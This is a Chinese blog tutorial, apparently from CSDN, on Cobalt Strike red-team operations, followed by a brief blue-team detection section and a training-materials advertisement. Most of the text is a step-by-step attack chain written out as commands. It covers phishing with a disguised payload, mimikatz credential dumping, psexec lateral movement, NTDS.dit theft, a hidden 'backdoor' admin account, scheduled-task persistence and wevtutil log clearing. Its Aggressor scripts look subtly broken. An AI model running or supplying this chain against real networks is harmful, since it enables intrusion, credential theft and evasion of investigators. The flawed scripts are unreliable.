在护网行动的内网渗透对抗中,Cobalt Strike(简称 CS)是红队的 “王牌工具”—— 它集远控、横向移动、权限提升、域渗透等功能于一体,支持团队协作,能构建完整的攻击链。本文将从环境部署、核心功能、护网实战攻击链、蓝队防御对抗四个维度,用详细的步骤和命令,带你掌握 CS 的全流程用法,让你在护网内网对抗中所向披靡。
一、Cobalt Strike 环境部署与基础配置(搭建攻击平台)
1. 服务端部署(Linux 环境)
系统要求:推荐 Ubuntu 20.04 或 CentOS 7,需公网 IP(供客户端连接和目标上线)。
部署步骤:
下载 Cobalt Strike 压缩包,上传至服务器并解压。
生成自签名证书(避免流量被检测):
keytool -keystore teamserver.keystore -keyalg RSA -genkey -alias teamserver -validity 3650- 启动 TeamServer:
./teamserver <服务器公网IP> <密码> -C teamserver.keystore -K <密钥>- 说明:
<密码>为客户端连接密码,-C指定证书,-K指定密钥(需与证书生成时一致)。
2. 客户端连接(Windows 环境)
系统要求:Windows 10/11,需安装 Java 8+。
连接步骤:
解压 Cobalt Strike 客户端,运行
cobaltstrike.exe。配置连接信息:
Host:服务器公网 IP。
Port:默认 50050(可在 TeamServer 启动时指定)。
User:自定义用户名(如 redteam01)。
Password:与 TeamServer 启动时设置的密码一致。
- 点击 “Connect”,成功连接后进入 CS 主界面。
3. 团队协作配置
新建团队项目:在 CS 主界面点击 “New”,创建项目(如 “护网行动 2025”),方便团队共享攻击数据。
权限管理:通过 “View → Preferences → Team” 设置团队成员权限,避免误操作(如限制低权限成员的 Beacon 生成权限)。
二、Cobalt Strike 核心功能解析(模块实战)
1. Beacon(远控核心)—— 红队的 “手术刀”
Beacon 是 CS 的远控代理,支持交互式命令执行、文件传输、横向移动等功能,护网中核心用法:
生成 Payload(初始访问):
场景:红队需通过钓鱼邮件获取目标初始控制权。
操作:
点击 “Attacks → Packages → Windows Executable”。
选择 Beacon 类型(HTTP、HTTPS、DNS,推荐 HTTPS 以加密通信)。
设置 Listener(监听器,指定 TeamServer 接收上线的地址和端口)。
生成
payload.exe,通过钓鱼邮件诱使目标执行。
Beacon 命令实战:
- 上线后,在 Beacon 控制台执行命令:
beacon> shell whoami # 执行系统命令 beacon> ps # 查看进程列表 beacon> download C:\flag.txt # 下载文件 beacon> upload /root/shell.php C:\inetpub\wwwroot # 上传文件2. Listener(监听器)—— 通信的 “桥梁”
Listener 用于配置 Beacon 的通信方式,护网中需重点关注其隐蔽性:
- HTTPS Listener 配置:
点击 “Cobalt Strike → Listeners → Add”。
选择 “HTTPS”,设置:
Host:服务器公网 IP。
Port:443(常用端口,降低被拦截概率)。
Certificate:选择之前生成的
teamserver.keystore。
- 点击 “Save”,生成 HTTPS 监听器,用于加密 Beacon 通信。
DNS Listener 配置(备用通信):
若 HTTPS 通信被阻断,可配置 DNS 监听器(通过 DNS 请求传输数据),步骤类似 HTTPS,但需提前配置域名解析(如
beacon.example.com指向 TeamServer)。
3. Aggressor Script(攻击脚本)—— 自动化的 “引擎”
Aggressor Script 是 CS 的脚本引擎,可自动化执行攻击任务,护网中常用脚本:
- Mimikatz 凭证抓取脚本:
alias mimikatz {   local('\$pid');   \$pid = beacon\_pid(\$1);   beacon\_inline\_execute(\$1, "mimikatz.exe sekurlsa::logonpasswords exit", "mimikatz\_\$pid.txt");   download \$1, "mimikatz\_\$pid.txt";   rm \$1, "mimikatz\_\$pid.txt"; }用法:在 Beacon 中执行
mimikatz,自动抓取凭证并下载。域内信息收集脚本:
alias enum\_domain {   local('\$domain');   \$domain = beacon\_hostname(\$1);   beacon\_inline\_execute(\$1, "nltest /dclist:\$domain", "dclist\_\$domain.txt");   beacon\_inline\_execute(\$1, "net group 'Domain Admins' /domain", "domain\_admins\_\$domain.txt");   download \$1, "dclist\_\$domain.txt";   download \$1, "domain\_admins\_\$domain.txt";   rm \$1, "dclist\_\$domain.txt";   rm \$1, "domain\_admins\_\$domain.txt"; }- 用法:在 Beacon 中执行
enum_domain,自动收集域控列表和域管理员信息。
三、护网红队实战:从初始访问到域控突破的攻击链
1. 阶段一:初始访问(获取 Beacon)
场景:红队通过钓鱼邮件投递 CS Payload,获取目标 Windows 服务器的初始控制权。
步骤:
生成 HTTPS Beacon Payload(
payload.exe)。将
payload.exe伪装成 “财务报表.exe”,通过钓鱼邮件发送给目标管理员。目标执行后,CS 界面的 “Beacon” 面板显示目标上线(Beacon 名称为目标主机名)。
2. 阶段二:内网信息收集
- 步骤:
在 Beacon 中执行
sysinfo(查看系统信息)、netstat -an(查看网络连接),了解目标网络环境。执行
enum_domain脚本,收集域内信息(域控 IP、域管理员账号)。执行
mimikatz脚本,抓取目标主机的用户凭证(如admin:123456)。
3. 阶段三:横向移动(拿下域控)
- 步骤:
- 利用抓取的凭证,通过 Psexec 横向移动至域控:
beacon> psexec 192.168.1.100 -u admin -p 123456- 说明:
192.168.1.100为域控 IP,admin为域管理员账号,123456为密码。
域控上线后,执行
shell net group "Domain Admins" /domain,确认已获得域管理员权限。执行
download C:\Windows\NTDS\NTDS.dit,下载域数据库(包含所有域用户凭证),完成域控突破。
4. 阶段四:权限维持
- 步骤:
- 在域控上创建隐藏管理员账号:
beacon> shell net user backdoor P@ssw0rd! /add beacon> shell net localgroup administrators backdoor /add- 部署持久性控制(如计划任务、服务项):
beacon> schtasks /create /tn "Update" /tr "C:\payload.exe" /sc daily /st 00:00- 清理痕迹:删除日志(
wevtutil cl System、wevtutil cl Security),确保攻击不被追溯。
四、蓝队防御:Cobalt Strike 检测与对抗
1. 流量特征识别
HTTPS Beacon 流量:
特征:长连接、通信数据加密(无明显 HTTP 请求)、User-Agent 固定(如
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko)。防御:在防火墙中设置规则,拦截非业务的 HTTPS 长连接;部署 SSL 流量解密设备,分析加密内容。
DNS Beacon 流量:
特征:大量 DNS 请求(如
beacon1.example.com、beacon2.example.com),请求域名无实际业务意义。防御:启用 DNS 安全策略,阻断异常 DNS 请求;部署 DNS 流量分析工具,识别域名生成算法(DGA)。
2. 进程与行为识别
Beacon 进程特征:
通常命名为
payload.exe、update.exe等,无数字签名,进程树异常(如svchost.exe启动未知子进程)。防御:部署 EDR 工具,设置规则拦截无签名的可疑进程;监控
CreateRemoteThread等进程注入行为。
Mimikatz 行为特征:
读取
lsass.exe内存(敏感系统调用)、创建mimikatz.exe进程。防御:在 EDR 中设置规则,发现
lsass.exe内存读取或mimikatz.exe进程时,自动隔离并告警。
3. 应急响应处置
- 步骤:
隔离受感染主机:断开网络连接,防止攻击扩散。
清除 Beacon:删除
payload.exe、计划任务、服务项等持久化组件。重置凭证:修改所有被窃取凭证的账号密码,尤其是域管理员密码。
溯源分析:通过流量日志、进程日志,还原攻击链,修补漏洞。
对红队内网渗透、域控突破这类高阶技术感兴趣?下面整理的网安全栈资料(含渗透工具包、漏洞实战案例、CTF 赛题解析),能让你从工具使用到实战思维全面提升~
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
